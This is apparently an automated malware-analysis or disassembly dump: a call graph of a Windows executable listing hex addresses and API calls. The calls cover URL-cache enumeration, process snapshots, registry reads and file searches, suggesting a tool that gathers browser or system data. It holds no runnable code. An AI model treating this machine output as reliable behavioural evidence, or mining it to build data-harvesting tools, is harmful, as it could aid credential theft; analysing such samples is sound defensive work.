37905->37908 37907 40a9f2 37906->37907 37907->37814 37908->37907 37933 409bca GetModuleFileNameW 37909->37933 37911 40dce6 wcsrchr 37912 40dcf5 37911->37912 37913 40dcf9 wcscat 37911->37913 37912->37913 37913->37822 37934 44db70 37914->37934 37918 40dbfd 37937 4447d9 37918->37937 37921 40dc34 wcscpy wcscpy 37963 40d6f5 37921->37963 37922 40dc1f wcscpy 37922->37921 37925 40d6f5 3 API calls 37926 40dc73 37925->37926 37927 40d6f5 3 API calls 37926->37927 37928 40dc89 37927->37928 37929 40d6f5 3 API calls 37928->37929 37930 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 37929->37930 37969 40da80 37930->37969 37933->37911 37935 40dbb4 memset memset 37934->37935 37936 409bca GetModuleFileNameW 37935->37936 37936->37918 37939 4447f4 37937->37939 37938 40dc1b 37938->37921 37938->37922 37939->37938 37940 444807 ??2@YAPAXI 37939->37940 37941 44481f 37940->37941 37942 444873 _snwprintf 37941->37942 37943 4448ab wcscpy 37941->37943 37976 44474a 8 API calls 37942->37976 37945 4448bb 37943->37945 37977 44474a 8 API calls 37945->37977 37946 4448a7 37946->37943 37946->37945 37948 4448cd 37978 44474a 8 API calls 37948->37978 37950 4448e2 37979 44474a 8 API calls 37950->37979 37952 4448f7 37980 44474a 8 API calls 37952->37980 37954 44490c 37981 44474a 8 API calls 37954->37981 37956 444921 37982 44474a 8 API calls 37956->37982 37958 444936 37983 44474a 8 API calls 37958->37983 37960 44494b 37984 44474a 8 API calls 37960->37984 37962 444960 ??3@YAXPAX 37962->37938 37964 44db70 37963->37964 37965 40d702 memset GetPrivateProfileStringW 37964->37965 37966 40d752 37965->37966 37967 40d75c WritePrivateProfileStringW 37965->37967 37966->37967 37968 40d758 37966->37968 37967->37968 37968->37925 37970 44db70 37969->37970 37971 40da8d memset 37970->37971 37972 40daac LoadStringW 37971->37972 37973 40dac6 37972->37973 37973->37972 37975 40dade 37973->37975 37985 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 37973->37985 37975->37755 37976->37946 37977->37948 37978->37950 37979->37952 37980->37954 37981->37956 37982->37958 37983->37960 37984->37962 37985->37973 37996 409b98 GetFileAttributesW 37986->37996 37988 40daea 37989 40db63 37988->37989 37990 40daef wcscpy wcscpy GetPrivateProfileIntW 37988->37990 37989->37757 37997 40d65d GetPrivateProfileStringW 37990->37997 37992 40db3e 37998 40d65d GetPrivateProfileStringW 37992->37998 37994 40db4f 37999 40d65d GetPrivateProfileStringW 37994->37999 37996->37988 37997->37992 37998->37994 37999->37989 38035 40eaff 38000->38035 38004 411ae2 memset 38003->38004 38005 411b8f 38003->38005 38076 409bca GetModuleFileNameW 38004->38076 38017 411a8b 38005->38017 38007 411b0a wcsrchr 38008 411b22 wcscat 38007->38008 38009 411b1f 38007->38009 38077 414770 wcscpy wcscpy wcscpy CloseHandle 38008->38077 38009->38008 38011 411b67 38078 402afb 38011->38078 38015 411b7f 38134 40ea13 SendMessageW memset SendMessageW 38015->38134 38018 402afb 27 API calls 38017->38018 38019 411ac0 38018->38019 38020 4110dc 38019->38020 38021 41113e 38020->38021 38026 4110f0 38020->38026 38159 40969c LoadCursorW SetCursor 38021->38159 38023 411143 38160 4032b4 38023->38160 38178 444a54 38023->38178 38024 4110f7 _wcsicmp 38024->38026 38025 411157 38027 40ada2 _wcsicmp 38025->38027 38026->38021 38026->38024 38181 410c46 10 API calls 38026->38181 38030 411167 38027->38030 38028 4111af 38030->38028 38031 4111a6 qsort 38030->38031 38031->38028 38034->37834 38036 40eb10 38035->38036 38049 40e8e0 38036->38049 38039 40eb6c memcpy memcpy 38040 40ebe1 38039->38040 38041 40ebb7 38039->38041 38040->38039 38042 40ebf2 ??2@YAPAXI ??2@YAPAXI 38040->38042 38041->38040 38043 40d134 16 API calls 38041->38043 38044 40ec2e ??2@YAPAXI 38042->38044 38047 40ec65 38042->38047 38043->38041 38044->38047 38059 40ea7f 38047->38059 38048 402f49 38048->37834 38050 40e8f2 38049->38050 38051 40e8eb ??3@YAXPAX 38049->38051 38052 40e900 38050->38052 38053 40e8f9 ??3@YAXPAX 38050->38053 38051->38050 38054 40e911 38052->38054 38055 40e90a ??3@YAXPAX 38052->38055 38053->38052 38056 40e931 ??2@YAPAXI ??2@YAPAXI 38054->38056 38057 40e921 ??3@YAXPAX 38054->38057 38058 40e92a ??3@YAXPAX 38054->38058 38055->38054 38056->38039 38057->38058 38058->38056 38060 40aa04 free 38059->38060 38061 40ea88 38060->38061 38062 40aa04 free 38061->38062 38063 40ea90 38062->38063 38064 40aa04 free 38063->38064 38065 40ea98 38064->38065 38066 40aa04 free 38065->38066 38067 40eaa0 38066->38067 38068 40a9ce 4 API calls 38067->38068 38069 40eab3 38068->38069 38070 40a9ce 4 API calls 38069->38070 38071 40eabd 38070->38071 38072 40a9ce 4 API calls 38071->38072 38073 40eac7 38072->38073 38074 40a9ce 4 API calls 38073->38074 38075 40ead1 38074->38075 38075->38048 38076->38007 38077->38011 38135 40b2cc 38078->38135 38080 402b0a 38081 40b2cc 27 API calls 38080->38081 38082 402b23 38081->38082 38083 40b2cc 27 API calls 38082->38083 38084 402b3a 38083->38084 38085 40b2cc 27 API calls 38084->38085 38086 402b54 38085->38086 38087 40b2cc 27 API calls 38086->38087 38088 402b6b 38087->38088 38089 40b2cc 27 API calls 38088->38089 38090 402b82 38089->38090 38091 40b2cc 27 API calls 38090->38091 38092 402b99 38091->38092 38093 40b2cc 27 API calls 38092->38093 38094 402bb0 38093->38094 38095 40b2cc 27 API calls 38094->38095 38096 402bc7 38095->38096 38097 40b2cc 27 API calls 38096->38097 38098 402bde 38097->38098 38099 40b2cc 27 API calls 38098->38099 38100 402bf5 38099->38100 38101 40b2cc 27 API calls 38100->38101 38102 402c0c 38101->38102 38103 40b2cc 27 API calls 38102->38103 38104 402c23 38103->38104 38105 40b2cc 27 API calls 38104->38105 38106 402c3a 38105->38106 38107 40b2cc 27 API calls 38106->38107 38108 402c51 38107->38108 38109 40b2cc 27 API calls 38108->38109 38110 402c68 38109->38110 38111 40b2cc 27 API calls 38110->38111 38112 402c7f 38111->38112 38113 40b2cc 27 API calls 38112->38113 38114 402c99 38113->38114 38115 40b2cc 27 API calls 38114->38115 38116 402cb3 38115->38116 38117 40b2cc 27 API calls 38116->38117 38118 402cd5 38117->38118 38119 40b2cc 27 API calls 38118->38119 38120 402cf0 38119->38120 38121 40b2cc 27 API calls 38120->38121 38122 402d0b 38121->38122 38123 40b2cc 27 API calls 38122->38123 38124 402d26 38123->38124 38125 40b2cc 27 API calls 38124->38125 38126 402d3e 38125->38126 38127 40b2cc 27 API calls 38126->38127 38128 402d59 38127->38128 38129 40b2cc 27 API calls 38128->38129 38130 402d78 38129->38130 38131 40b2cc 27 API calls 38130->38131 38132 402d93 38131->38132 38133 4018db GetWindowPlacement memset GetSystemMetrics GetSystemMetrics SetWindowPlacement 38132->38133 38133->38015 38134->38005 38138 40b58d 38135->38138 38137 40b2d1 38137->38080 38139 40b5a4 GetModuleHandleW FindResourceW 38138->38139 38140 40b62e 38138->38140 38141 40b5c2 LoadResource 38139->38141 38143 40b5e7 38139->38143 38140->38137 38142 40b5d0 SizeofResource LockResource 38141->38142 38141->38143 38142->38143 38143->38140 38151 40afcf 38143->38151 38145 40b608 memcpy 38154 40b4d3 memcpy 38145->38154 38147 40b61e 38155 40b3c1 18 API calls 38147->38155 38149 40b626 38156 40b04b 38149->38156 38152 40b04b ??3@YAXPAX 38151->38152 38153 40afd7 ??2@YAPAXI 38152->38153 38153->38145 38154->38147 38155->38149 38157 40b051 ??3@YAXPAX 38156->38157 38158 40b05f 38156->38158 38157->38158 38158->38140 38159->38023 38161 4032c4 38160->38161 38162 40b633 free 38161->38162 38163 403316 38162->38163 38182 44553b 38163->38182 38167 403480 38380 40368c 15 API calls 38167->38380 38169 403489 38170 40b633 free 38169->38170 38172 403495 38170->38172 38171 40333c 38171->38167 38173 4033a9 memset memcpy 38171->38173 38174 4033ec wcscmp 38171->38174 38378 4028e7 11 API calls 38171->38378 38379 40f508 6 API calls 38171->38379 38172->38025 38173->38171 38173->38174 38174->38171 38176 403421 _wcsicmp 38176->38171 38179 444a64 FreeLibrary 38178->38179 38180 444a83 38178->38180 38179->38180 38180->38025 38181->38026 38183 445548 38182->38183 38184 445599 38183->38184 38381 40c768 38183->38381 38185 4455a8 memset 38184->38185 38327 4457f2 38184->38327 38465 403988 38185->38465 38191 4455e5 38200 445672 38191->38200 38210 44560f 38191->38210 38193 4458bb memset memset 38197 414c2e 16 API calls 38193->38197 38195 4459ed 38201 445a00 memset memset 38195->38201 38202 445b22 38195->38202 38196 44595e memset memset 38203 414c2e 16 API calls 38196->38203 38204 4458f9 38197->38204 38198 44557a 38205 44558c 38198->38205 38445 4136c0 38198->38445 38476 403fbe memset memset memset memset memset 38200->38476 38207 414c2e 16 API calls 38201->38207 38212 445bca 38202->38212 38213 445b38 memset memset memset 38202->38213 38208 44599c 38203->38208 38209 40b2cc 27 API calls 38204->38209 38449 444b06 38205->38449 38217 445a3e 38207->38217 38219 40b2cc 27 API calls 38208->38219 38220 445909 38209->38220 38222 4087b3 335 API calls 38210->38222 38221 445c8b memset memset 38212->38221 38278 445cf0 38212->38278 38225 445bd4 38213->38225 38226 445b98 38213->38226 38214 445849 38659 40b1ab free free 38214->38659 38227 40b2cc 27 API calls 38217->38227 38235 4459ac 38219->38235 38231 409d1f 6 API calls 38220->38231 38236 414c2e 16 API calls 38221->38236 38232 445621 38222->38232 38224 44589f 38660 40b1ab free free 38224->38660 38614 414c2e 38225->38614 38226->38225 38238 445ba2 38226->38238 38240 445a4f 38227->38240 38230 403335 38377 4452e5 43 API calls 38230->38377 38246 445919 38231->38246 38645 4454bf 20 API calls 38232->38645 38233 445823 38233->38214 38255 4087b3 335 API calls 38233->38255 38234 445854 38241 4458aa 38234->38241 38591 403c9c memset memset memset memset memset 38234->38591 38247 409d1f 6 API calls 38235->38247 38248 445cc9 38236->38248 38750 4099c6 wcslen 38238->38750 38239 4456b2 38647 40b1ab free free 38239->38647 38252 409d1f 6 API calls 38240->38252 38241->38193 38274 44594a 38241->38274 38244 445d3d 38273 40b2cc 27 API calls 38244->38273 38245 445d88 memset memset memset 38256 414c2e 16 API calls 38245->38256 38661 409b98 GetFileAttributesW 38246->38661 38257 4459bc 38247->38257 38258 409d1f 6 API calls 38248->38258 38249 445879 38249->38224 38268 4087b3 335 API calls 38249->38268 38251 445680 38251->38239 38499 4087b3 memset 38251->38499 38261 445a63 38252->38261 38253 40b2cc 27 API calls 38262 445bf3 38253->38262 38255->38233 38265 445dde 38256->38265 38726 409b98 GetFileAttributesW 38257->38726 38267 445ce1 38258->38267 38259 445bb3 38753 445403 memset 38259->38753 38271 40b2cc 27 API calls 38261->38271 38630 409d1f wcslen wcslen 38262->38630 38263 445928 38263->38274 38662 40b6ef 38263->38662 38275 40b2cc 27 API calls 38265->38275 38770 409b98 GetFileAttributesW 38267->38770 38268->38249 38280 445a94 38271->38280 38283 445d54 _wcsicmp 38273->38283 38274->38195 38274->38196 38286 445def 38275->38286 38276 4459cb 38276->38195 38293 40b6ef 249 API calls 38276->38293 38278->38230 38278->38244 38278->38245 38279 445389 255 API calls 38279->38212 38727 40ae18 38280->38727 38281 44566d 38281->38327 38550 413d4c 38281->38550 38290 445d71 38283->38290 38354 445d67 38283->38354 38285 445665 38646 40b1ab free free 38285->38646 38291 409d1f 6 API calls 38286->38291 38771 445093 23 API calls 38290->38771 38298 445e03 38291->38298 38293->38195 38294 4456d8 38300 40b2cc 27 API calls 38294->38300 38297 44563c 38297->38285 38303 4087b3 335 API calls 38297->38303 38772 409b98 GetFileAttributesW 38298->38772 38299 40b6ef 249 API calls 38299->38230 38305 4456e2 38300->38305 38301 40b2cc 27 API calls 38306 445c23 38301->38306 38302 445d83 38302->38230 38303->38297 38648 413fa6 _wcsicmp _wcsicmp 38305->38648 38310 409d1f 6 API calls 38306->38310 38308 445e12 38314 445e6b 38308->38314 38321 40b2cc 27 API calls 38308->38321 38312 445c37 38310->38312 38311 4456eb 38317 4456fd memset memset memset memset 38311->38317 38318 4457ea 38311->38318 38319 445389 255 API calls 38312->38319 38313 445b17 38747 40aebe 38313->38747 38774 445093 23 API calls 38314->38774 38649 409c70 wcscpy wcsrchr 38317->38649 38652 413d29 38318->38652 38325 445c47 38319->38325 38326 445e33 38321->38326 38323 445e7e 38328 445f67 38323->38328 38331 40b2cc 27 API calls 38325->38331 38332 409d1f 6 API calls 38326->38332 38327->38234 38568 403e2d memset memset memset memset memset 38327->38568 38334 40b2cc 27 API calls 38328->38334 38329 445ab2 memset 38335 40b2cc 27 API calls 38329->38335 38337 445c53 38331->38337 38333 445e47 38332->38333 38773 409b98 GetFileAttributesW 38333->38773 38339 445f73 38334->38339 38340 445aa1 38335->38340 38336 409c70 2 API calls 38341 44577e 38336->38341 38342 409d1f 6 API calls 38337->38342 38344 409d1f 6 API calls 38339->38344 38340->38313 38340->38329 38345 409d1f 6 API calls 38340->38345 38353 445389 255 API calls 38340->38353 38734 40add4 38340->38734 38739 40ae51 38340->38739 38346 409c70 2 API calls 38341->38346 38347 445c67 38342->38347 38343 445e56 38343->38314 38351 445e83 memset 38343->38351 38348 445f87 38344->38348 38345->38340 38349 44578d 38346->38349 38350 445389 255 API calls 38347->38350 38777 409b98 GetFileAttributesW 38348->38777 38349->38318 38356 40b2cc 27 API calls 38349->38356 38350->38212 38355 40b2cc 27 API calls 38351->38355 38353->38340 38354->38230 38354->38299 38357 445eab 38355->38357 38358 4457a8 38356->38358 38359 409d1f 6 API calls 38357->38359 38360 409d1f 6 API calls 38358->38360 38361 445ebf 38359->38361 38362 4457b8 38360->38362 38363 40ae18 9 API calls 38361->38363 38651 409b98 GetFileAttributesW 38362->38651 38373 445ef5 38363->38373 38365 4457c7 38365->38318 38367 4087b3 335 API calls 38365->38367 38366 40ae51 9 API calls 38366->38373 38367->38318 38368 445f5c 38370 40aebe FindClose 38368->38370 38369 40add4 2 API calls 38369->38373 38370->38328 38371 40b2cc 27 API calls 38371->38373 38372 409d1f 6 API calls 38372->38373 38373->38366 38373->38368 38373->38369 38373->38371 38373->38372 38375 445f3a 38373->38375 38775 409b98 GetFileAttributesW 38373->38775 38776 445093 23 API calls 38375->38776 38377->38171 38378->38176 38379->38171 38380->38169 38382 40c775 38381->38382 38778 40b1ab free free 38382->38778 38384 40c788 38779 40b1ab free free 38384->38779 38386 40c790 38780 40b1ab free free 38386->38780 38388 40c798 38389 40aa04 free 38388->38389 38390 40c7a0 38389->38390 38781 40c274 memset 38390->38781 38395 40a8ab 9 API calls 38396 40c7c3 38395->38396 38397 40a8ab 9 API calls 38396->38397 38398 40c7d0 38397->38398 38810 40c3c3 38398->38810 38402 40c877 38411 40bdb0 38402->38411 38403 40c86c 38838 4053fe 37 API calls 38403->38838 38406 40c813 _wcslwr 38836 40c634 47 API calls 38406->38836 38408 40c829 wcslen 38409 40c7e5 38408->38409 38409->38402 38409->38403 38835 40a706 wcslen memcpy 38409->38835 38837 40c634 47 API calls 38409->38837 38972 404363 38411->38972 38416 40b2cc 27 API calls 38417 40be02 wcslen 38416->38417 38418 40bf5d 38417->38418 38426 40be1e 38417->38426 38989 40440c 38418->38989 38419 40be26 wcsncmp 38419->38426 38422 40be7d memset 38423 40bea7 memcpy 38422->38423 38422->38426 38424 40bf11 wcschr 38423->38424 38423->38426 38424->38426 38425 40b2cc 27 API calls 38427 40bef6 _wcsnicmp 38425->38427 38426->38418 38426->38419 38426->38422 38426->38423 38426->38424 38426->38425 38428 40bf43 LocalFree 38426->38428 38992 40bd5d 28 API calls 38426->38992 38993 404423 38426->38993 38427->38424 38427->38426 38428->38426 38429 4135f7 39005 4135e0 38429->39005 38432 40b2cc 27 API calls 38433 41360d 38432->38433 38434 40a804 8 API calls 38433->38434 38435 413613 38434->38435 38436 41363e 38435->38436 38438 40b273 27 API calls 38435->38438 38437 4135e0 FreeLibrary 38436->38437 38439 413643 38437->38439 38440 413625 38438->38440 38439->38198 38440->38436 38441 413648 38440->38441 38442 413658 38441->38442 38443 4135e0 FreeLibrary 38441->38443 38442->38198 38444 413666 38443->38444 38444->38198 38447 4136e2 38445->38447 38446 413827 38644 41366b FreeLibrary 38446->38644 38447->38446 38448 4137ac CoTaskMemFree 38447->38448 38448->38447 39008 4449b9 38449->39008 38452 444c1f 38452->38184 38453 4449b9 35 API calls 38455 444b4b 38453->38455 38454 444c15 38457 4449b9 35 API calls 38454->38457 38455->38454 39028 444972 GetVersionExW 38455->39028 38457->38452 38458 444b99 memcmp 38462 444b8c 38458->38462 38459 444c0b 39032 444a85 35 API calls 38459->39032 38462->38458 38462->38459 39029 444aa5 35 API calls 38462->39029 39030 40a7a0 GetVersionExW 38462->39030 39031 444a85 35 API calls 38462->39031 38466 40399d 38465->38466 39033 403a16 38466->39033 38468 403a09 39047 40b1ab free free 38468->39047 38470 403a12 wcsrchr 38470->38191 38471 4039a3 38471->38468 38474 4039f4 38471->38474 39044 40a02c CreateFileW 38471->39044 38474->38468 38475 4099c6 2 API calls 38474->38475 38475->38468 38477 414c2e 16 API calls 38476->38477 38478 404048 38477->38478 38479 414c2e 16 API calls 38478->38479 38480 404056 38479->38480 38481 409d1f 6 API calls 38480->38481 38482 404073 38481->38482 38483 409d1f 6 API calls 38482->38483 38484 40408e 38483->38484 38485 409d1f 6 API calls 38484->38485 38486 4040a6 38485->38486 38487 403af5 20 API calls 38486->38487 38488 4040ba 38487->38488 38489 403af5 20 API calls 38488->38489 38490 4040cb 38489->38490 39074 40414f memset 38490->39074 38492 4040e0 38493 404140 38492->38493 38495 4040ec memset 38492->38495 38497 4099c6 2 API calls 38492->38497 38498 40a8ab 9 API calls 38492->38498 39088 40b1ab free free 38493->39088 38495->38492 38496 404148 38496->38251 38497->38492 38498->38492 39101 40a6e6 WideCharToMultiByte 38499->39101 38501 4087ed 39102 4095d9 memset 38501->39102 38504 408809 memset memset memset memset memset 38505 40b2cc 27 API calls 38504->38505 38506 4088a1 38505->38506 38507 409d1f 6 API calls 38506->38507 38508 4088b1 38507->38508 38509 40b2cc 27 API calls 38508->38509 38510 4088c0 38509->38510 38511 409d1f 6 API calls 38510->38511 38512 4088d0 38511->38512 38513 40b2cc 27 API calls 38512->38513 38514 4088df 38513->38514 38515 409d1f 6 API calls 38514->38515 38516 4088ef 38515->38516 38517 40b2cc 27 API calls 38516->38517 38518 4088fe 38517->38518 38519 409d1f 6 API calls 38518->38519 38520 40890e 38519->38520 38521 40b2cc 27 API calls 38520->38521 38522 40891d 38521->38522 38523 409d1f 6 API calls 38522->38523 38524 40892d 38523->38524 39119 409b98 GetFileAttributesW 38524->39119 38526 40893e 38527 408943 38526->38527 38528 408958 38526->38528 39120 407fdf 75 API calls 38527->39120 39121 409b98 GetFileAttributesW 38528->39121 38531 408964 38532 408969 38531->38532 38533 40897b 38531->38533 39122 4082c7 198 API calls 38532->39122 39123 409b98 GetFileAttributesW 38533->39123 38536 408953 38536->38251 38537 408987 38538 4089a1 38537->38538 38539 40898c 38537->38539 39125 409b98 GetFileAttributesW 38538->39125 39124 408560 29 API calls 38539->39124 38542 4089ad 38543 4089b2 38542->38543 38544 4089c7 38542->38544 39126 408560 29 API calls 38543->39126 39127 409b98 GetFileAttributesW 38544->39127 38547 4089d3 38547->38536 38548 4089d8 38547->38548 39128 408560 29 API calls 38548->39128 38551 40b633 free 38550->38551 38552 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38551->38552 38553 413f00 Process32NextW 38552->38553 38554 413da5 OpenProcess 38553->38554 38555 413f17 CloseHandle 38553->38555 38556 413df3 memset 38554->38556 38559 413eb0 38554->38559 38555->38294 39151 413f27 38556->39151 38558 413ebf free 38558->38559 38559->38553 38559->38558 38560 4099f4 3 API calls 38559->38560 38560->38559 38561 413e37 GetModuleHandleW 38563 413e46 38561->38563 38565 413e1f 38561->38565 38563->38565 38564 413e6a QueryFullProcessImageNameW 38564->38565 38565->38561 38565->38564 39156 413959 38565->39156 39172 413ca4 38565->39172 38567 413ea2 CloseHandle 38567->38559 38569 414c2e 16 API calls 38568->38569 38570 403eb7 38569->38570 38571 414c2e 16 API calls 38570->38571 38572 403ec5 38571->38572 38573 409d1f 6 API calls 38572->38573 38574 403ee2 38573->38574 38575 409d1f 6 API calls 38574->38575 38576 403efd 38575->38576 38577 409d1f 6 API calls 38576->38577 38578 403f15 38577->38578 38579 403af5 20 API calls 38578->38579 38580 403f29 38579->38580 38581 403af5 20 API calls 38580->38581 38582 403f3a 38581->38582 38583 40414f 33 API calls 38582->38583 38589 403f4f 38583->38589 38584 403faf 39185 40b1ab free free 38584->39185 38585 403f5b memset 38585->38589 38587 403fb7 38587->38233 38588 4099c6 2 API calls 38588->38589 38589->38584 38589->38585 38589->38588 38590 40a8ab 9 API calls 38589->38590 38590->38589 38592 414c2e 16 API calls 38591->38592 38593 403d26 38592->38593 38594 414c2e 16 API calls 38593->38594 38595 403d34 38594->38595 38596 409d1f 6 API calls 38595->38596 38597 403d51 38596->38597 38598 409d1f 6 API calls 38597->38598 38599 403d6c 38598->38599 38600 409d1f 6 API calls 38599->38600 38601 403d84 38600->38601 38602 403af5 20 API calls 38601->38602 38603 403d98 38602->38603 38604 403af5 20 API calls 38603->38604 38605 403da9 38604->38605 38606 40414f 33 API calls 38605->38606 38612 403dbe 38606->38612 38607 403e1e 39186 40b1ab free free 38607->39186 38608 403dca memset 38608->38612 38610 403e26 38610->38249 38611 4099c6 2 API calls 38611->38612 38612->38607 38612->38608 38612->38611 38613 40a8ab 9 API calls 38612->38613 38613->38612 38615 414b81 8 API calls 38614->38615 38616 414c40 38615->38616 38617 414c73 memset 38616->38617 39187 409cea 38616->39187 38619 414c94 38617->38619 39190 414592 RegOpenKeyExW 38619->39190 38621 414c64 SHGetSpecialFolderPathW 38623 414d0b 38621->38623 38623->38253 38624 414cc1 38625 414cf4 wcscpy 38624->38625 39191 414bb0 wcscpy 38624->39191 38625->38623 38627 414cd2 39192 4145ac RegQueryValueExW 38627->39192 38629 414ce9 RegCloseKey 38629->38625 38631 409d62 38630->38631 38632 409d43 wcscpy 38630->38632 38635 445389 38631->38635 38633 409719 2 API calls 38632->38633 38634 409d51 wcscat 38633->38634 38634->38631 38636 40ae18 9 API calls 38635->38636 38637 4453c4 38636->38637 38638 40ae51 9 API calls 38637->38638 38639 4453f3 38637->38639 38640 40add4 2 API calls 38637->38640 38643 445403 250 API calls 38637->38643 38638->38637 38641 40aebe FindClose 38639->38641 38640->38637 38642 4453fe 38641->38642 38642->38301 38643->38637 38644->38205 38645->38297 38646->38281 38647->38281 38648->38311 38650 409c89 38649->38650 38650->38336 38651->38365 38653 413d39 38652->38653 38654 413d2f FreeLibrary 38652->38654 38655 40b633 free 38653->38655 38654->38653 38656 413d42 38655->38656 38657 40b633 free 38656->38657 38658 413d4a 38657->38658 38658->38327 38659->38234 38660->38241 38661->38263 38663 44db70 38662->38663 38664 40b6fc memset 38663->38664 38665 409c70 2 API calls 38664->38665 38666 40b732 wcsrchr 38665->38666 38667 40b743 38666->38667 38668 40b746 memset 38666->38668 38667->38668 38669 40b2cc 27 API calls 38668->38669 38670 40b76f 38669->38670 38671 409d1f 6 API calls 38670->38671 38672 40b783 38671->38672 39193 409b98 GetFileAttributesW 38672->39193 38674 40b792 38676 409c70 2 API calls 38674->38676 38688 40b7c2 38674->38688 38678 40b7a5 38676->38678 38681 40b2cc 27 API calls 38678->38681 38679 40b837 CloseHandle 38683 40b83e memset 38679->38683 38680 40b817 39277 409a45 GetTempPathW 38680->39277 38684 40b7b2 38681->38684 39227 40a6e6 WideCharToMultiByte 38683->39227 38685 409d1f 6 API calls 38684->38685 38685->38688 38686 40b827 38686->38683 39194 40bb98 38688->39194 38689 40b866 39228 444432 38689->39228 38692 40bad5 38695 40b04b ??3@YAXPAX 38692->38695 38693 40b273 27 API calls 38694 40b89a 38693->38694 39274 438552 38694->39274 38697 40baf3 38695->38697 38697->38274 38699 40bacd 39308 443d90 110 API calls 38699->39308 38702 40bac6 39307 424f26 122 API calls 38702->39307 38703 40b8bd memset 39298 425413 17 API calls 38703->39298 38706 425413 17 API calls 38724 40b8b8 38706->38724 38709 40a71b MultiByteToWideChar 38709->38724 38710 40a734 MultiByteToWideChar 38710->38724 38713 40b9b5 memcmp 38713->38724 38714 4099c6 2 API calls 38714->38724 38715 404423 37 API calls 38715->38724 38718 4251c4 136 API calls 38718->38724 38719 40bb3e memset memcpy 39309 40a734 MultiByteToWideChar 38719->39309 38721 40bb88 LocalFree 38721->38724 38724->38702 38724->38703 38724->38706 38724->38709 38724->38710 38724->38713 38724->38714 38724->38715 38724->38718 38724->38719 38725 40ba5f memcmp 38724->38725 39299 4253ef 16 API calls 38724->39299 39300 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38724->39300 39301 4253af 17 API calls 38724->39301 39302 4253cf 17 API calls 38724->39302 39303 447280 memset 38724->39303 39304 447960 memset memcpy memcpy memcpy 38724->39304 39305 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38724->39305 39306 447920 memcpy memcpy memcpy 38724->39306 38725->38724 38726->38276 38728 40aebe FindClose 38727->38728 38729 40ae21 38728->38729 38730 4099c6 2 API calls 38729->38730 38731 40ae35 38730->38731 38732 409d1f 6 API calls 38731->38732 38733 40ae49 38732->38733 38733->38340 38735 40ade0 38734->38735 38736 40ae0f 38734->38736 38735->38736 38737 40ade7 wcscmp 38735->38737 38736->38340 38737->38736 38738 40adfe wcscmp 38737->38738 38738->38736 38740 40ae7b FindNextFileW 38739->38740 38741 40ae5c FindFirstFileW 38739->38741 38742 40ae94 38740->38742 38743 40ae8f 38740->38743 38741->38742 38745 40aeb6 38742->38745 38746 409d1f 6 API calls 38742->38746 38744 40aebe FindClose 38743->38744 38744->38742 38745->38340 38746->38745 38748 40aed1 38747->38748 38749 40aec7 FindClose 38747->38749 38748->38202 38749->38748 38751 4099d7 38750->38751 38752 4099da memcpy 38750->38752 38751->38752 38752->38259 38754 40b2cc 27 API calls 38753->38754 38755 44543f 38754->38755 38756 409d1f 6 API calls 38755->38756 38757 44544f 38756->38757 39667 409b98 GetFileAttributesW 38757->39667 38759 44545e 38760 445476 38759->38760 38761 40b6ef 249 API calls 38759->38761 38762 40b2cc 27 API calls 38760->38762 38761->38760 38763 445482 38762->38763 38764 409d1f 6 API calls 38763->38764 38765 445492 38764->38765 39668 409b98 GetFileAttributesW 38765->39668 38767 4454a1 38768 4454b9 38767->38768 38769 40b6ef 249 API calls 38767->38769 38768->38279 38769->38768 38770->38278 38771->38302 38772->38308 38773->38343 38774->38323 38775->38373 38776->38373 38777->38354 38778->38384 38779->38386 38780->38388 38782 414c2e 16 API calls 38781->38782 38783 40c2ae 38782->38783 38839 40c1d3 38783->38839 38788 40c3be 38805 40a8ab 38788->38805 38789 40afcf 2 API calls 38790 40c2fd FindFirstUrlCacheEntryW 38789->38790 38791 40c3b6 38790->38791 38792 40c31e wcschr 38790->38792 38793 40b04b ??3@YAXPAX 38791->38793 38794 40c331 38792->38794 38795 40c35e FindNextUrlCacheEntryW 38792->38795 38793->38788 38797 40a8ab 9 API calls 38794->38797 38795->38792 38796 40c373 GetLastError 38795->38796 38798 40c3ad FindCloseUrlCache 38796->38798 38799 40c37e 38796->38799 38800 40c33e wcschr 38797->38800 38798->38791 38801 40afcf 2 API calls 38799->38801 38800->38795 38802 40c34f 38800->38802 38803 40c391 FindNextUrlCacheEntryW 38801->38803 38804 40a8ab 9 API calls 38802->38804 38803->38792 38803->38798 38804->38795 38933 40a97a 38805->38933 38808 40a8cc 38808->38395 38809 40a8d0 7 API calls 38809->38808 38938 40b1ab free free 38810->38938 38812 40c3dd 38813 40b2cc 27 API calls 38812->38813 38814 40c3e7 38813->38814 38939 414592 RegOpenKeyExW 38814->38939 38816 40c3f4 38817 40c50e 38816->38817 38818 40c3ff 38816->38818 38832 405337 38817->38832 38819 40a9ce 4 API calls 38818->38819 38820 40c418 memset 38819->38820 38940 40aa1d 38820->38940 38823 40c471 38825 40c47a _wcsupr 38823->38825 38824 40c505 RegCloseKey 38824->38817 38826 40a8d0 7 API calls 38825->38826 38827 40c498 38826->38827 38828 40a8d0 7 API calls 38827->38828 38829 40c4ac memset 38828->38829 38830 40aa1d 38829->38830 38831 40c4e4 RegEnumValueW 38830->38831 38831->38824 38831->38825 38942 405220 38832->38942 38834 405340 38834->38409 38835->38406 38836->38408 38837->38409 38838->38402 38840 40ae18 9 API calls 38839->38840 38846 40c210 38840->38846 38841 40ae51 9 API calls 38841->38846 38842 40c264 38843 40aebe FindClose 38842->38843 38845 40c26f 38843->38845 38844 40add4 2 API calls 38844->38846 38851 40e5ed memset memset 38845->38851 38846->38841 38846->38842 38846->38844 38847 40c231 _wcsicmp 38846->38847 38848 40c1d3 34 API calls 38846->38848 38847->38846 38849 40c248 38847->38849 38848->38846 38864 40c084 21 API calls 38849->38864 38852 414c2e 16 API calls 38851->38852 38853 40e63f 38852->38853 38854 409d1f 6 API calls 38853->38854 38855 40e658 38854->38855 38865 409b98 GetFileAttributesW 38855->38865 38857 40e667 38858 409d1f 6 API calls 38857->38858 38860 40e680 38857->38860 38858->38860 38866 409b98 GetFileAttributesW 38860->38866 38861 40e68f 38862 40c2d8 38861->38862 38867 40e4b2 38861->38867 38862->38788 38862->38789 38864->38846 38865->38857 38866->38861 38888 40e01e 38867->38888 38869 40e593 38870 40e5b0 38869->38870 38871 40e59c DeleteFileW 38869->38871 38872 40b04b ??3@YAXPAX 38870->38872 38871->38870 38874 40e5bb 38872->38874 38873 40e521 38873->38869 38911 40e175 38873->38911 38876 40e5c4 CloseHandle 